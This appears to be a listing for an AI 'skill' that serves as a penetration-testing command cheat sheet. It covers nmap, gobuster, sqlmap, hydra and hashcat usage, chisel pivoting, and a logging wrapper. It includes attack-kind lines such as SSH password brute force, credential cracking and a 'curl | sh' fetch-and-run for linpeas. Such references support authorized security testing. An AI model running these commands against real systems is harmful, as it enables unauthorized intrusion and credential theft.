
Pentest Commands Dynamic

Boost productivity with this skill. Includes structured workflows, validation checks, and reusable patterns for security.

Skill · Cliptics · security · v1.0.0 · MIT


Reference and execute essential penetration testing commands across reconnaissance, scanning, exploitation, and post-exploitation phases. This skill provides a comprehensive command reference for network scanning, web testing, credential attacks, pivoting, and evidence collection tools.

When to Use This Skill

Choose Pentest Commands Dynamic when you need to:

  • Look up specific tool commands and options during an active engagement
  • Chain multiple tools together for a specific testing objective
  • Find the right command syntax for common pentest scenarios
  • Build one-liners and automation scripts for repetitive testing tasks

Consider alternatives when:

  • You need to understand methodology and planning (use Pentest Checklist Studio)
  • You need in-depth tool guidance (use tool-specific skills like Metasploit, Burp)
  • You need to write professional reports (use Ethical Hacking Smart)

Quick Start

    # === RECONNAISSANCE ===
    # Subdomain enumeration
    subfinder -d target.com -silent | sort -u > subdomains.txt
    # DNS resolution of discovered subdomains
    cat subdomains.txt | httpx -silent -status-code -title > live_hosts.txt

    # === SCANNING ===
    # Full TCP port scan
    nmap -p- --min-rate 5000 -oA full_scan target.com
    # Service version detection on open ports
    nmap -sC -sV -p 22,80,443,8080 -oA service_scan target.com

    # === WEB TESTING ===
    # Directory brute force
    gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt -t 50
    # Parameter discovery
    arjun -u https://target.com/api/endpoint

    # === CREDENTIAL TESTING ===
    # SSH brute force (authorized testing only)
    hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://target.com -t 4

Core Concepts

Command Reference by Phase

    Phase     | Tool        | Command
    ----------|-------------|------------------------------------------
    Recon     | nmap        | nmap -sn 10.0.0.0/24 (host discovery)
    Recon     | dig         | dig +short target.com ANY
    Scanning  | nmap        | nmap -sC -sV -p- target.com
    Scanning  | nikto       | nikto -h https://target.com
    Web       | gobuster    | gobuster dir -u URL -w wordlist
    Web       | sqlmap      | sqlmap -u "URL?id=1" --batch --dbs
    Web       | ffuf        | ffuf -w wordlist -u URL/FUZZ
    Exploit   | msfconsole  | use exploit/...; set RHOSTS; exploit
    Creds     | hydra       | hydra -l user -P list ssh://target
    Creds     | john        | john --wordlist=rockyou.txt hashes.txt
    Creds     | hashcat     | hashcat -m 1000 hashes.txt wordlist
    Post      | linpeas     | curl -sL URL | sh
    Pivot     | chisel      | chisel server -p 8000 --reverse

Network Reconnaissance Commands

    # Host discovery across a subnet
    nmap -sn 10.0.0.0/24 -oG - | grep "Up" | awk '{print $2}'

    # Comprehensive port scan with service detection
    nmap -sC -sV -O -p- --min-rate 5000 -oA comprehensive target.com

    # UDP scan (top 100 ports — UDP is slow)
    sudo nmap -sU --top-ports 100 -oA udp_scan target.com

    # SMB enumeration
    enum4linux -a target.com
    smbclient -L //target.com -N
    crackmapexec smb target.com --shares -u '' -p ''

    # SNMP enumeration
    snmpwalk -v2c -c public target.com

    # Web technology detection
    whatweb https://target.com
    wappalyzer-cli https://target.com

    # SSL/TLS assessment
    sslscan target.com:443
    testssl.sh https://target.com

    # Email harvesting
    theHarvester -d target.com -b google,linkedin -l 200

Configuration

    Parameter   | Description                            | Default
    ------------|----------------------------------------|----------------------------------
    target      | Target IP, domain, or CIDR range       | Required
    wordlist    | Default wordlist for brute forcing     | /usr/share/wordlists/rockyou.txt
    threads     | Concurrent threads for scanning tools  | 10
    output_dir  | Directory for scan results             | ./pentest_output
    proxy       | Proxy for web tools (Burp)             | http://127.0.0.1:8080
    user_agent  | Custom User-Agent string               | Tool default
    timeout     | Connection timeout in seconds          | 10
    rate_limit  | Max requests per second                | Tool default

Best Practices

  1. Save all tool output with -o flags — Every scanning tool supports output files. Use them: nmap -oA scan, gobuster -o dirs.txt, sqlmap --output-dir=results. You'll need this output for the report, and re-running scans wastes time.

  2. Chain tools together with pipes for efficiency — subfinder -d target.com | httpx -silent | nuclei -t cves/ discovers subdomains, finds live hosts, and scans for CVEs in a single pipeline. Tool chaining is faster than running each tool separately.

  3. Start with fast broad scans, then targeted deep scans — Run nmap -p- --min-rate 5000 first to find all open ports quickly, then nmap -sC -sV -p PORTS on the discovered ports for detailed analysis. This is faster than running a full -sC -sV -p- scan.

  4. Use tmux or screen to manage multiple sessions — Run long-running scans in separate tmux panes. Use tmux new -s pentest and split panes for simultaneous scanning, exploitation, and note-taking. Sessions persist if your SSH connection drops.

  5. Document commands in a living notes file — Keep a running log of every command and its output in a text file. Use a format like timestamp | tool | command | result summary. This becomes the backbone of your penetration test report.
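Practices 1 and 5 can be enforced by a small wrapper rather than by discipline alone. The following is an added example, not part of the skill itself: it runs a command, saves its full output under an output directory (default mirrors the output_dir parameter above), and appends one line in the skill's `timestamp | tool | command | result summary` format to a notes file. The names OUTPUT_DIR, NOTES_FILE, log_cmd and notes_count_tool are assumptions chosen here; bash and coreutils are required.

```shell
#!/usr/bin/env bash
# Added example (not the skill's own code): wrapper that saves every
# command's output and records a "timestamp | tool | command | summary"
# line in a living notes file. OUTPUT_DIR and NOTES_FILE are assumed names.

OUTPUT_DIR="${OUTPUT_DIR:-./pentest_output}"
NOTES_FILE="${NOTES_FILE:-$OUTPUT_DIR/notes.log}"

# log_cmd "SUMMARY" COMMAND [ARGS...]
# Runs COMMAND, stores stdout+stderr in a timestamped file, appends the
# notes line, and returns the command's own exit status.
log_cmd() {
    local summary="$1"; shift
    local tool="${1##*/}"            # tool name = basename of the command
    mkdir -p "$OUTPUT_DIR"
    local ts; ts="$(date -u +%Y-%m-%dT%H:%M:%SZ)"
    # mktemp suffix keeps two runs of the same tool in one second distinct
    local outfile; outfile="$(mktemp "$OUTPUT_DIR/${ts//:/-}_${tool}.XXXXXX")"
    local rc=0
    # if/else keeps a failing command from aborting a 'set -e' shell
    if "$@" >"$outfile" 2>&1; then rc=0; else rc=$?; fi
    local lines; lines="$(wc -l <"$outfile" | tr -d ' ')"
    printf '%s | %s | %s | %s (exit %s, %s lines, %s)\n' \
        "$ts" "$tool" "$*" "$summary" "$rc" "$lines" "$outfile" >>"$NOTES_FILE"
    return "$rc"
}

# notes_count_tool TOOL -> number of notes entries recorded for TOOL,
# e.g. to confirm every nmap run of the engagement made it into the notes.
notes_count_tool() {
    [ -f "$NOTES_FILE" ] || { echo 0; return 0; }
    awk -F' \\| ' -v t="$1" '$2 == t { n++ } END { print n + 0 }' "$NOTES_FILE"
}
```

Each saved output file path is part of the notes line, so the notes file doubles as an index of evidence for the report.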

Common Issues

Nmap scans are extremely slow on large networks — Use --min-rate 5000 for fast scanning and -T4 for aggressive timing. For host discovery, use -sn (ping scan) first, then port scan only live hosts. Avoid -p- on entire subnets — scan top 1000 ports first.

Gobuster/ffuf misses directories that exist — The wordlist may not contain the directory name. Try multiple wordlists: common.txt, big.txt, raft-medium-words.txt. Also try different extensions: -x php,html,js,txt. Some servers require specific headers — add -H "Host: target.com".

Hydra/medusa credential attacks trigger lockouts — Use -t 1 (single thread) and add delays (-W 30 in hydra) to avoid lockouts. Check the lockout policy first. For most engagements, test only a few high-probability passwords across all accounts rather than many passwords on one account.
